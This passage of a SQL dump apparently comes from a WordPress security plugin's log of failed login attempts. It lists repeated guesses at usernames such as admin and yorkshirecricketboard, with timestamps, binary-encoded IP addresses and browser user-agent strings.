Firefox/62.0'),(310,619,1624499601.779905,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(311,620,1624499678.318439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(312,621,1624499758.088227,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(313,622,1624499907.339207,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(314,624,1624500230.382323,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���X�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(315,624,1624500230.440495,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���X�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(316,626,1624500399.543719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(317,627,1624500537.282610,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(318,628,1624500697.028174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(319,636,1624501477.807280,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(320,637,1624501707.427465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(321,639,1624501863.886027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(322,642,1624502958.486066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(323,644,1624503109.235393,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(324,645,1624503206.092276,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(325,646,1624503289.833904,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(326,647,1624503342.813357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(327,649,1624503506.886970,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(328,652,1624503995.372934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(329,653,1624504357.321382,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(330,656,1624504597.342333,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(331,656,1624504597.379586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(332,657,1624504681.273380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(333,660,1624505000.185929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��’)d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(334,666,1624505621.524262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(335,671,1624506710.612640,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(336,676,1624507599.164225,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(337,677,1624507751.838095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"�F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(338,678,1624507838.616151,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ɢ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(339,681,1624508627.735302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(340,682,1624508726.108323,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(341,682,1624508726.143674,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(342,686,1624509411.267152,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���찍','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(343,687,1624509415.299543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���0Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(344,688,1624509509.911818,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(345,690,1624509736.994653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ɢ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(346,691,1624509809.393272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��V?F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(347,693,1624510151.383317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(348,694,1624510361.595987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xcڌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(349,695,1624510451.448146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H@a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(350,697,1624510690.896659,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(351,697,1624510690.931331,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0���&V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(352,698,1624510758.553685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%:0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(353,699,1624510842.118958,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��@�5?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(354,700,1624510862.695325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(355,701,1624510963.444842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(356,702,1624511335.020721,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���FzC','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(357,707,1624512163.187598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(358,707,1624512163.224273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(359,708,1624512230.397154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Xc�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(360,710,1624512555.648914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(361,711,1624512710.558554,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���ɧ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(362,714,1624513289.610036,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���c?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(363,716,1624513790.642396,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(364,717,1624513881.502358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-7<n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(365,718,1624514121.523769,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��*Š','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(366,719,1624514249.222117,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(367,721,1624514530.382628,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(368,722,1624514601.265283,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(369,723,1624515121.096088,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(370,724,1624515380.078654,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(371,725,1624515572.942349,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(372,726,1624515672.609381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(373,730,1624516249.378276,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(374,731,1624516659.305747,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��co�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(375,733,1624516840.293566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(376,735,1624516930.384958,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��=�F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(377,742,1624517901.651967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(378,745,1624520265.723961,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(379,746,1624522093.175125,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(380,747,1624523675.790022,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(381,748,1624527292.191856,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(382,749,1624530959.568577,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(383,750,1624532833.932893,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Go','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(384,751,1624538287.399001,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(385,752,1624539511.993080,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ν�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(386,753,1624543237.790172,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���;N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(387,754,1624544562.903907,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(388,757,1624548717.616237,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(389,758,1624550252.015636,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���찍','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(390,759,1624551781.708411,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(391,760,1624562002.359278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(392,761,1624574273.549033,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[p\'','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(393,763,1624580913.642998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(394,764,1624590925.242381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Cl','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(395,765,1624599885.752669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����l','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(396,766,1624606787.940054,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(397,767,1624606789.350334,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(398,768,1624607246.438683,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(399,769,1624607252.239911,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(400,770,1624607638.048318,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��Cͭ@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(401,771,1624607640.354450,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Cͭ@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(402,772,1624610678.083234,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(403,773,1624610678.632227,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(404,774,1624610679.682757,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(405,775,1624610680.216709,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(406,776,1624610680.765567,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(407,777,1624610681.282286,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(408,778,1624610681.872557,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(409,779,1624610682.489320,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(410,780,1624610683.045887,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(411,781,1624610685.531533,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(412,782,1624610686.093999,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(413,783,1624610686.618034,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(414,784,1624610687.137802,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(415,784,1624610687.154838,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(416,785,1624610687.741679,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(417,785,1624610687.767139,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(418,786,1624610688.313002,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(419,787,1624610688.823914,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(420,787,1624610688.839398,1,'loginFailInvalidUsername','xuananh',0,'\0\0\0\0\0\0\0\0\0\0��Q�L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(421,789,1624614477.561665,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(422,790,1624614478.849201,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(423,791,1624615549.704579,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���z]c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(424,792,1624615554.776496,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���z]c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(425,793,1624615790.768592,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��ν!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(426,794,1624615791.938030,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ν!�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(427,795,1624616043.290065,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(428,796,1624616044.010559,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(429,797,1624616199.087568,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��Tɪ=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(430,797,1624616199.124786,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��Tɪ=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(431,798,1624616199.518671,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Tɪ=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(432,799,1624616430.073366,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��T� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(433,800,1624616430.359244,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��T� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(434,801,1624616873.964573,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(435,802,1624617009.299184,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���ƀ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(436,803,1624617010.046075,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ƀ�','Mozilla/5.0 (X11; Ubuntu; Linux 